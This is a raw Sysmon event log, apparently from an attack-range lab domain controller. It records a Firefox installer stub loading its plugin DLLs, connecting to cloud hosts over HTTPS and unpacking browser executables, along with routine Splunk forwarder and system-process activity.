13:59:43.380{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.380{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.380{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.380{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.380{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:43.365{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeC:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\WebBrowser.dll2021-01-18 13:59:43.365 10341000x800000000000000013892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.115{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.115{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.115{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.115{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.115{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:43.037{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeC:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\CityHash.dll2021-01-18 13:59:43.037 10341000x800000000000000013886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.021{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.021{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:43.021{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeC:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\UserInfo.dll2021-01-18 13:59:43.021 11241100x800000000000000013883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:43.021{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeC:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\UAC.dll2021-01-18 13:59:43.021 11241100x800000000000000013882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:43.005{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeC:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\System.dll2021-01-18 13:59:43.005 354300x800000000000000013922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localUsermode2021-01-18 13:59:43.591{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-495.attackrange.local49201-false18.205.79.132ec2-18-205-79-132.compute-1.amazonaws.com443https 10341000x800000000000000013921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.755{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.755{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.755{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.740{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.740{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:44.599{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeC:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\CertCheck.dll2021-01-18 13:59:44.599 10341000x800000000000000013915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.568{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9450-6005-2305-00000000A301}5656C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.568{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.568{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.568{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.568{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.568{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9450-6005-2305-00000000A301}5656C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.568{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9450-6005-2305-00000000A301}5656C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.568{59A5CD1D-9450-6005-2305-00000000A301}5656C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000013961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localUsermode2021-01-18 13:59:43.883{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-495.attackrange.local49202-false13.224.189.56server-13-224-189-56.fra2.r.cloudfront.net443https 11241100x800000000000000013960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:45.958{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\firefox.exe2021-01-18 13:59:45.958 11241100x800000000000000013959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:45.943{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\default-browser-agent.exe2021-01-18 13:59:45.943 11241100x800000000000000013958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:45.943{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\crashreporter.exe2021-01-18 13:59:45.943 10341000x800000000000000013957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.849{59A5CD1D-940F-6005-0C05-00000000A301}64766824C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141977|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\SYSTEM32\IEFRAME.dll+13bf2f|C:\Windows\SYSTEM32\IEFRAME.dll+1bf969|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.849{59A5CD1D-940F-6005-0C05-00000000A301}64766824C:\Program Files\Internet 